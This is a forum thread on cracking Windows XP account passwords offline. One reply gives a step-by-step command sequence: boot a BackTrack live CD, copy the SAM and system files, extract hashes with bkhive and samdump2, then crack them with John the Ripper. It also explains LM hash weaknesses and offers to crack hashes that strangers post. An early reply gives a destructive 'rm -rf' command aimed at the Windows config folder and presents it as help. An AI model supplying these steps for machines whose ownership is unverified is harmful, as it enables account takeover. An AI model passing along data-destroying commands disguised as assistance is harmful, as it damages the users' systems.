Help with cracking windows xp password
I have the entire contents of the windows/system32/config/ folder on a flash drive. I watched the tutroial and it didnt help much. Can anyone help? Thanks!
rm -rf /windows/system32/config/
This is for testing purposes only on our local domain. Replace as necessary.
For you, mount /mnt/*usb*
run samdump2 and dump it to /*usb*
brute it or rainbow it.
If you copy/pasted the system32 to a flash drive it won't work. fyi
What if i copied the system32\config\ folder with the auditor live cd? I didnt do it through windows. if that makes a difference.
where are the rainbow tables located when i install backtrack on my hdd? Thanks
i tried the winxp passwd crack for fun and got some output i dont really understand
with john -show hashes.txt it said that one of 8 hashes has been cracked
can someone enlighten me please?
Windows password cracking.
To explain kirmet's question. the windows password has been stored in the SAM database (local windows accounts, not domain!) with the Lan Manager Hashing algorithm as well as the newer NTLM hashing algorithm.
The LM hash is old, it was used for Window 3.1, 95, 98 etc. You do not need it anymore, in fact I would advise that you switch it off with either a registry change or through local security policies.
The LM hash is insecure because it takes your password and immediately converts it to UPPERCASE. This removes any case sensitivity you had. It then splits your password into two 7 character passwords, padding out the second to make 7 characters. e.g.
It then hashes (one way encryption) the two passwords seperately...
PASSHAV = 7713c9168576a5ff
e58 = 194db5b7f19c8340
It then concatenates them...
And that is stored in the SAM database along with the NTLM hash...
The NTLM hash is stronger as it hashes the password with case sensitivity and can accept up to 254 characters (I think!).
Now that the revision is out of the way, to answer your question...
John The Ripper has broken the second half of the LM hash - e58 and not the first. Did you do a brute force attack or a dictionary attack? The advantage of doing a dictionary attack is that it is very quick, just a couple of minutes to get through a decent sized dictionary, but the password HAS to exist in the dictionary file. The advantage of a brute force is that you will get the password eventually, but it may take a long time.
Now, the rest.
In Back|Track (I'll show you the syntax's with Back|Track instead of Auditor/Whax as it is the latest)
First off, boot your Windows machine with the Back|Track CD.
It should automatically mount the windows partition, if not...
root@slax:/# mkdir /mnt/win
root@slax:/# mount /dev/hda1 /mnt/win
root@slax:/# cd /mnt/win/WINDOWS/System32/config
root@slax:/# cp SAM /tmp
root@slax:/# cp system /tmp
That copies the two required files - SAM and system to the /tmp directory. Now you need to prepare the dictionary file.
root@slax:/# cd /pentest/password/dictionaries/
root@slax:/# gunzip -c wordlist.txt.Z > /tmp/wordlist.txt
root@slax:/# cd /tmp
Now you need to decrypt the SAM file...
root@slax:/# bkhive system key
Now extract the SAM file contents to a text file.
root@slax:/# samdump2 SAM key > hashes.txt
Now run John to break the passwords.
root@slax:/# john -w=wordlist.txt hashes.txt
By default it attacks the LM hash, but you can force it to the NTLM hash.
root@slax:/# john -w=wordlist.txt -f=NT hashes.txt
If the passwords appears in the dictionary file, then john will crack it quickly. If not, then you will have to carry out a brute force attack. (Rainbow tables is another very effective option, but Back|Track does not have any tables inbuilt as they are HUGE!)
I have made a shockwave flash tutorial on local windows password cracking with Back|Track, but have nowhere to put it for people to download.
Hope this helps you.
*two thumbs up for that awesome explanation*
well i did a dictionary attack first and a brute forced after that - the E58 part was broken with the dictionary attack - but i stopped the brute force after some time.
so (sry but i cant remember exactly what the output said) when it said something like
...testing key ASAMDDR - ASAEERR
the algorithm tries to crack the first and the second 7 char set of the passwd?
Glad you liked my explanation. I teach pen testing for a living so I should be able to explain it!! ;-)
That message at the end of John basically tells you that it is running through the possible combinations of the passwords.
Do you still want to crack the password? If you post it, I'll crack it with rainbow tables. Preferably post the samdump2 output.
You should be able to run through all the possible combinations in about 3 days for a brute force attack against a LM hash.
Hi I tried this on my machine (dell xps gen2) and when I got to command line # samdump2 SAM key > hashes.txt it came up with
No password for user Administrator (500)
No password for user Guest (501)
I carried on with the rest of the commands with the result of
No password hashes loaded
I was wondering why mine is not doing what it is meant to.
Other than that thanks for the great tutorial.